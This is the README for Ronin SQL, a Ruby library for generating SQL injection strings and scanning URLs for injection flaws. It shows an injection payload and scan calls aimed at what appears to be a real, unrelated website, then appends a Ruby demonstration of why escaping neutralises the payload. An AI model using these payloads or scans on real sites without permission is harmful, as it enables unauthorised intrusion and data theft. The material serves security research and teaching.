Ronin SQL
Ronin SQL is a Ruby library for Ronin that provides support for SQL-related security tasks.
Ronin is a Ruby platform for exploit development and security research. Ronin allows for the rapid development and distribution of code, exploits or payloads over many common Source-Code-Management (SCM) systems.
Ruby
Ronin's Ruby environment allows security researchers to leverage Ruby with ease. The Ruby environment contains a multitude of convenience methods for working with data in Ruby, a Ruby Object Database, a customized Ruby Console and an extendable command-line interface.
Extend
Ronin's more specialized features are provided by additional Ronin libraries, which users can choose to install. These libraries can allow one to write and run Exploits and Payloads, scan for PHP vulnerabilities, perform Google Dorks or run 3rd party scanners.
Publish
Features
- Provides a DSL for crafting normal SQL and SQL injections.
- Provides tests for finding SQL injections.
Synopsis
- Start the Ronin console with Ronin SQL preloaded:
    $ ronin-sql
Examples
- Generate valid SQL using the Ronin SQL DSL:
    require 'ronin/code/sql'
    Code.sql { select(:from => :users, :where => (name == 'bob')) }.to_s
    # => "SELECT * FROM users WHERE name = 'bob'"
- Generate valid SQL injections using the Ronin SQL injection DSL:
    Code.sql_injection { escape_string { has_table?(:users) } }.to_s
    # => "' AND (SELECT count(*) FROM users) = 1 --"
- Test a URL for SQL Injection (SQLi):
    require 'ronin/sql'
    url = URI('http://redteatrosalternativos.com/_05enlaces/links/phpHoo3.php?viewCat=1')
    url.has_sqli?
    # => true
- Get the first viable SQLi vulnerability:
    url.first_sqli
    # => #<Ronin::SQL::Injection: ...>
- Scan a URL for SQLi vulnerabilities:
    url.sqli_scan
    # => [#<Ronin::SQL::Injection: ...>, ...]
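The following is an added example, not part of Ronin SQL or this README: it shows why the injection string generated above changes a query built by string interpolation, and why the same string stays inert once quotes are escaped. The method names, the `users` query shape and the simplified tokenizer (standard SQL quoting and `--` comments only) are assumptions made for illustration.

```ruby
# Added example, not Ronin code; every method name below is hypothetical.
# Payload string copied from the Code.sql_injection output shown above.
PAYLOAD = "' AND (SELECT count(*) FROM users) = 1 --"

# Vulnerable pattern: input interpolated straight into a string literal.
def naive_query(name)
  "SELECT * FROM users WHERE name = '#{name}'"
end

# Illustrative fix: double embedded single quotes (standard SQL escaping).
# Production code should use the driver's bound parameters instead.
def escaped_query(name)
  "SELECT * FROM users WHERE name = '#{name.gsub("'", "''")}'"
end

# Return the SQL that lies outside single-quoted literals and before a
# -- comment, i.e. the part the database would parse as code.
def sql_outside_literals(sql)
  out = +''
  in_string = false
  i = 0
  while i < sql.length
    ch = sql[i]
    if in_string
      if ch == "'" && sql[i + 1] == "'"
        i += 1                 # '' is an escaped quote, still inside the literal
      elsif ch == "'"
        in_string = false      # closing quote
      end
    elsif ch == "'"
      in_string = true         # opening quote
    elsif ch == '-' && sql[i + 1] == '-'
      break                    # rest of the statement is a comment
    else
      out << ch
    end
    i += 1
  end
  out.strip.gsub(/\s+/, ' ')
end

# True when the input changes the query's code compared with a benign value.
def alters_structure?(builder, input)
  sql_outside_literals(builder.call(input)) != sql_outside_literals(builder.call('bob'))
end

puts alters_structure?(method(:naive_query), PAYLOAD)    # true
puts alters_structure?(method(:escaped_query), PAYLOAD)  # false
```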
Requirements
Install
$ sudo gem install ronin-sql